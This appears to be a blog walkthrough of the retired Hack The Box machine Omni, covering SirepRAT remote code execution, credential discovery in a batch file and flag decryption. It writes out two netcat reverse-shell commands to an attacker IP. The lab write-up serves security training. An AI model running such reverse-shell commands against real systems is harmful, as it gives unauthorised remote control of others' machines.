Omni HacktheBox Walkthrough OSCP Like

New to Hack the Box then you must check out this HackTheBox Get Invite Code in 5 mins Walkthrough

Omni HacktheBox

Omni is an Windows IoT Core machine that is retired on Hack The Box. It covers exploiting vulnerable Sirep Test Service in the IoT Core OS, remote code execution and receiving reverse shell on the target host, finding credential file by enumerating the file system, and eventually getting the user and root flags.

We first run nmap to enumerate open ports and services running on those ports, and the following results showing that 2 ports are open.

Omni HacktheBox Walkthrough OSCP Like

-sC: default nmap scripts

-sV: detect service version

Add the domain in the /etc/hosts file.

Omni HacktheBox Walkthrough OSCP Like

We start off with enumerating HTTP first.

An authentication pop-up. It asks for credentials from us to continue.

Omni HacktheBox Walkthrough OSCP Like

We do not have any credentials. What is Windows Device Portal? Let’s google it.

Omni HacktheBox Walkthrough OSCP Like

The web page provides us some information. So, we understand that it is related to Windows 10 IoT Core.

The web page also shows, that port 8080, means that dev mode is enabled from default.

https://docs.microsoft.com/en-us/windows/uwp/debug-test-perf/device-portal

Note the default credentials.

Omni HacktheBox Walkthrough OSCP Like

The default credentials are not working.

Omni HacktheBox Walkthrough OSCP Like

We search for exploits related to Windows IoT Core.

Omni HacktheBox Walkthrough OSCP Like

SirepRAT is a tool that allows us exploiting Windows IoT Core target. What it simple does is, to dump the SAM and copy the SYSTEM registry files.

Omni HacktheBox Walkthrough OSCP Like

Clone the repository.

Omni HacktheBox Walkthrough OSCP Like

We install required modules in order to exploit can work properly.

Omni HacktheBox Walkthrough OSCP Like

Firstly let’s see how it does work by typing “–help”

Omni HacktheBox Walkthrough OSCP Like

These are the available commands we can use.

Omni HacktheBox Walkthrough OSCP Like

Here is the plan. We will establish a reverse shell by using powershell. To do so, we will first upload netcat to the target machine. Then, we will run netcat reverse shell command by using SirepRAT and if everything goes well it will send us a connection request while we are waiting for it on listening mode.

We have netcat which is 64 bits. (Netcat 32 bits did not work at the first attempt.)

Omni HacktheBox Walkthrough OSCP Like

Start up a simple python server in the directory netcat is in.

Omni HacktheBox Walkthrough OSCP Like

This command will upload nc64.exe file to the directory which is specified below.

Omni HacktheBox Walkthrough OSCP Like

Set up a listener to receive the reverse shell.

Omni HacktheBox Walkthrough OSCP Like

We run the command to receive reverse shell.

Omni HacktheBox Walkthrough OSCP Like

Perfect! We get a shell.

Omni HacktheBox Walkthrough OSCP Like

Who are we on this Windows machine? #whoami

Omni HacktheBox Walkthrough OSCP Like

Privilege Escalation

Let’s check the root.txt file.

Omni HacktheBox Walkthrough OSCP Like

Here we try to apply decrypt process on both root.txt and user.txt but we failed because user omni has a low level privilege.

Omni HacktheBox Walkthrough OSCP Like
Omni HacktheBox Walkthrough OSCP Like
Omni HacktheBox Walkthrough OSCP Like

We start enumerating the directories one by one to get some interesting information.

Omni HacktheBox Walkthrough OSCP Like
Omni HacktheBox Walkthrough OSCP Like

Well, a bat file might be interesting for us. Let’s check it inside.

Omni HacktheBox Walkthrough OSCP Like

Cool! We get the credentials. Let’s use them one by one at the web application (omni.htb:8080).

Omni HacktheBox Walkthrough OSCP Like

First, we log in as user app.

Omni HacktheBox Walkthrough OSCP Like
Omni HacktheBox Walkthrough OSCP Like

And we have command prompt to run command. What is the next step now? Yes! Let’s try to receive reverse shell.

Omni HacktheBox Walkthrough OSCP Like

We set up a listener on port 6767.

Omni HacktheBox Walkthrough OSCP Like

Run the command.

Omni HacktheBox Walkthrough OSCP Like
Full command: C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 6767 -e powershell.exe

And we have another shell as user app.

Omni HacktheBox Walkthrough OSCP Like

We are user app. That means we might be able to decrypt the encrypted content in user.txt file. To do so, we execute the following commands.

Omni HacktheBox Walkthrough OSCP Like
Omni HacktheBox Walkthrough OSCP Like

We successfully get the decrypted version of user.txt flag.

Omni HacktheBox Walkthrough OSCP Like

We need to privilege escalation again in order to view the root.txt flag. But wait a sec! What if we as app user can decrypt the encrypted content in root.txt file? Let’s just give a try.

Omni HacktheBox Walkthrough OSCP Like

We could not decrypt the root.txt file. Well, we need to be administrator user. To do so, we will use the other credentials that we got from r.bat file.

Omni HacktheBox Walkthrough OSCP Like

We apply the same process that we have just done before.

Setting a listener to receive reverse shell.

Omni HacktheBox Walkthrough OSCP Like

Same command on web application command prompt. Just remember! We are now logged in as administrator user.

Omni HacktheBox Walkthrough OSCP Like
Full command: C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 7878 -e powershell.exe

And here we are as administrator.

Omni HacktheBox Walkthrough OSCP Like

We apply the same decryption process for the root.txt file.

Omni HacktheBox Walkthrough OSCP Like

We successfully view the decrypted version of root.txt file after execute the following command.

Omni HacktheBox Walkthrough OSCP Like

Thank you for you time.

Leave a Comment

error: Content is protected !!
Please Click on 1 or 2 Ads to help us run this site.